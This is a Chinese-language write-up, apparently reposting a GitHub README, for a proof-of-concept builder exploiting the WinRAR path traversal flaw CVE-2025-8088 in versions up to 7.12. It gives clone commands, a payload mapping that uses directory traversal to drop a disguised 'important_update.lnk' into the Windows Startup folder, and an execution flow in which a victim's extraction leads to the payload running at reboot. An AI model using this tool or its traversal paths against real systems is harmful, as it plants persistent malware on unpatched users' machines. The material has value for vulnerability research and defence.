本文详细分析了WinRAR路径遍历漏洞CVE-2025-8088的利用方法,涉及RAR文件结构操纵、多ADS流技术利用,以及如何通过构造恶意压缩包实现持久化攻击的技术细节。
CVE-2025-8088-WinRAR构建器
一个针对WinRAR漏洞(CVE-2025-8088)的概念验证利用程序,影响7.12及以下版本
🚀 工作原理
- 创建包含其他有效载荷的Rar嵌入文件
- 使用多ADS流🔄 - 附加具有不同路径遍历深度的有效载荷流
- 操纵RAR头文件⚙️ - 修改存档结构以利用路径遍历漏洞
- 将有效载荷投递到启动文件夹📂 - 在解压时尝试将有效载荷写入Windows启动文件夹
🛠️ 使用方法
- 克隆仓库
1
2
|
git clone https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder.git
cd CVE-2025-8088-WinRAR-builder
|
- 准备有效载荷
- 将有效载荷添加到该文件夹(exe、dll、lnk等)
- 在脚本中修改
PAYLOAD_MAPPING
1
2
3
4
5
6
7
8
9
10
11
12
|
# 2. 将我们的有效载荷映射到相应的目标位置
# 格式:(payloads_dir中的文件名, 目标提取路径)
PAYLOAD_MAPPING: List[Tuple[str, str]] = [
# 有效载荷1
("payload.lnk", "..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\important_update.lnk"),
# 有效载荷2
("image.png", "C:\\Users\\Public\\Downloads\\logo.png"),
# 有效载荷3
# 添加你自己的有效载荷
]
|
- 运行利用程序
🔄 执行流程
- 受害者使用易受攻击的WinRAR(≤7.12)解压RAR文件
- 有效载荷被写入目标文件夹,例如:
1
|
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
|
- 在下次重启时➡️有效载荷自动执行
📋 要求
- Windows操作系统🪟
- Python 3.x🐍
- 已安装WinRAR